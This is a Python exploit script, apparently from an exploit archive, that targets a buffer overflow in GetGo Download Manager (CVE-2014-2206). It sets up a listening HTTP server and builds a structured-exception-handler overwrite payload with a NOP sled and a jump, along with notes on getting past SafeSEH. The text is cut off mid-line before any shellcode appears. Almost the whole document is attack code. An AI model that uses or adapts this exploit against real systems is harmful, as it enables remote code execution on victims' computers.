#!/usr/bin/python # Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution # Version: v4.9.0.1982 # CVE: CVE-2014-2206 # Date: 2014-03-09 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.getgosoft.com # Tested on: WinXP SP3-GER # # Howto / Notes: # SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled # from socket import * from time import sleep from struct import pack host = "192.168.0.1" port = 80 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] junk0 = "\x90" * 4107 nseh = "\x90\x90\xEB\x06" seh=pack('